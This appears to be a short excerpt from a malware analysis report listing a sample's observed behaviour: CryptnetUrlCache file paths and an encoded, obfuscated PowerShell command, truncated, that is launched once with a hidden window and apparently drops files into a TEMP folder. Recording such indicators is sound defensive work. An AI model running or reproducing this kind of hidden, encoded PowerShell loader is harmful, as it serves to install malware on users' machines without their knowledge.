Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...' (with hidden window)